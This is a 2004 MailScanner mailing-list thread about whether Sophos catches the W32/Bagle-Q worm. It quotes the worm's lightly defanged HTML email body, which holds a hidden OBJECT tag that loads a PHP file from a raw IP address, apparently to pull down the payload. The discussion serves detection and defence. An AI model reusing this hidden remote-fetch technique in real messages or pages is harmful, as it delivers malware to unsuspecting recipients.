Will MailScanner pickup the W32/Bagle-Q virus?

John Rudd jrudd at UCSC.EDU
Thu Mar 18 23:25:01 GMT 2004


I'm not sure that the Sophos IDE will catch the _email_ message.  If the
virus file was on your hard drive, then it might catch that, but that's
not what MailScanner is dealing with.  MailScanner is dealing with this:

%html>%body>
%font  face="System">
%OBJECT STYLE="display:none" DATA="http://169.233.42.189:81/915914.php">
%/OBJECT>%/body>%/html>


( replace the %'s with <'s )

There's nothing in that message body for sophos to trip over.


We've had the sophos IDE on our system since last night at 11:30pm
(about 7:30 GMT on the 18th), but our logs don't show any instances of
Bagle-Q being identified ... even though we have some indications that
it is actually hitting some of our users.


Ryan Bingham wrote:
>
> Just a quick question on this:  if you're running MailScanner with
> Sophos and have the latest Sophos IDE's, would there be any reason to
> upgrade to the beta version?
>
> Thanks,
>
> Ryan
>
> On Thu, 2004-03-18 at 18:04, Peter Bonivart wrote:
> > Jason Williams wrote:
> > > For these rules, where would one put them in? spam.assassin.prefs.conf ?
> >
> > That's OK if it's just a couple of rules but if you want to start a
> > little collection of special rules it might be better to put it in a .cf
> > file in /etc/mail/spamassassin. The upgrades (of MS) will be easier.
> >
> > --
> > /Peter Bonivart
> >
> > --Unix lovers do it in the Sun
> >
> > Sun Fire V210, Solaris 9, Sendmail 8.12.10, MailScanner 4.25-14,
> > SpamAssassin 2.63 + DCC 1.2.30, ClamAV 0.67 + GMP 4.1.2, MailStats 0.25



More information about the MailScanner mailing list